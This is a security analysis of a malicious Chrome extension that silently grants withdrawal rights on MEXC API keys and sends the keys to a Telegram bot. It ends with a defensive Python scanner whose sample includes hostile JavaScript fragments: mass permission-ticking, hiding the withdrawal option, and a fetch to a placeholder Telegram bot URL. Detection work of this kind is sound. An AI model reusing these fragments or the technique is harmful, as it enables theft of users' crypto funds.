
Stealing API keys that carry withdrawal rights gives cybercriminals direct, automated access to crypto funds, multiplying the potential financial loss across the exchange ecosystem. The attack demonstrates a new vector that sidesteps traditional password‑based defenses and shows why platforms and users need to tighten API security.
The rise of browser‑based malware targeting cryptocurrency exchanges reflects attackers’ shift toward harvesting long‑lived API credentials rather than passwords. Unlike one‑time login tokens, API keys often grant unrestricted trading and withdrawal capabilities, making them a high‑value prize for threat actors. By embedding malicious scripts within a seemingly legitimate Chrome extension, cybercriminals can infiltrate an authenticated session without triggering typical security alerts, turning everyday trading tools into covert data‑stealing conduits.
Technical analysis reveals that the MEXC API Automator leverages Manifest V3 permissions to inject code on the exchange’s API‑management page. It programmatically selects all permission checkboxes, then applies CSS tricks and a mutation observer to conceal the withdrawal option from the user’s view. Once the exchange generates the access and secret keys, the extension captures them and forwards the pair via an HTTPS POST to a Telegram bot identified by a hard‑coded token. This exfiltration method bypasses two‑factor authentication, as the attacker only needs the user’s post‑2FA session to complete the theft. The same “SwapSushi” branding across X, YouTube, and malicious domains suggests a coordinated campaign capable of replicating this playbook across other platforms.
For exchanges and traders, the incident underscores the necessity of layered API security. Exchanges should enforce granular permission defaults, require explicit user confirmation for withdrawal rights, and provide real‑time alerts for newly created keys. Users must audit installed extensions, revoke all unused API keys, and employ IP whitelisting or withdrawal limits where possible. As threat actors refine browser‑based credential harvesting, the industry must evolve beyond password hygiene, integrating behavioral analytics and stricter extension vetting to protect billions in digital assets.
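For the extension audit recommended above, here is an added example (not code from the article or from any vendor) of a static triage script that checks an unpacked Manifest V3 extension for the indicators described earlier: content scripts scoped to the exchange, a Telegram host permission, a hard-coded Telegram bot URL, mass checkbox enabling, and a MutationObserver paired with hiding of anything labelled "withdraw". The exchange domain list, the regexes and the sample manifest and script are constructed assumptions for this example.

```python
import json
import re

# Watchlists and regexes are assumptions for this example, not values taken
# from the real extension; they encode the behaviour the article describes.
EXCHANGE_DOMAINS = ("mexc.com",)
TELEGRAM_BOT_URL = re.compile(r"api\.telegram\.org/bot\d+:[\w-]+")
CHECKBOX_SELECT = re.compile(r"querySelectorAll\([^)]*checkbox")
CHECK_ALL = re.compile(r"\.checked\s*=\s*true")
HIDE_STYLE = re.compile(r"display\W*none|visibility\W*hidden")


def _patterns(manifest):
    """Collect every URL pattern the extension declares (MV3 fields)."""
    found = list(manifest.get("host_permissions", []))
    for cs in manifest.get("content_scripts", []):
        found.extend(cs.get("matches", []))
    return found


def scan_extension(manifest_json, script_sources):
    """Return sorted indicator names found in an unpacked extension."""
    manifest = json.loads(manifest_json)
    patterns = _patterns(manifest)
    findings = set()
    if any(d in p for p in patterns for d in EXCHANGE_DOMAINS):
        findings.add("targets_exchange_pages")
    if any("api.telegram.org" in p for p in patterns):
        findings.add("telegram_host_permission")
    for src in script_sources.values():  # file name -> JavaScript source text
        if TELEGRAM_BOT_URL.search(src):
            findings.add("hardcoded_telegram_bot_token")
        if CHECKBOX_SELECT.search(src) and CHECK_ALL.search(src):
            findings.add("mass_checkbox_enable")  # ticks every permission box
        if "MutationObserver" in src and HIDE_STYLE.search(src) and "withdraw" in src.lower():
            findings.add("hides_withdrawal_option")
    return sorted(findings)


# Constructed sample: indicator-bearing fragments, not a working extension.
SUSPECT_MANIFEST = json.dumps({
    "manifest_version": 3, "name": "API Automator (constructed sample)",
    "host_permissions": ["https://api.telegram.org/*"],
    "content_scripts": [{"matches": ["https://*.mexc.com/*"], "js": ["content.js"]}],
})
SUSPECT_SCRIPT = "\n".join([
    "document.querySelectorAll('input[type=checkbox]').forEach(c => c.checked = true);",
    "new MutationObserver(() => { withdrawRow.style.display = 'none'; });",
    "fetch('https://api.telegram.org/bot123456:PLACEHOLDER_TOKEN/sendMessage');",
])
BENIGN_MANIFEST = json.dumps({"manifest_version": 3, "name": "Theme", "content_scripts": []})
```

Run `scan_extension(SUSPECT_MANIFEST, {"content.js": SUSPECT_SCRIPT})` against the constructed sample to see all five indicators; a single indicator on its own is only a lead for manual review, not proof of malice.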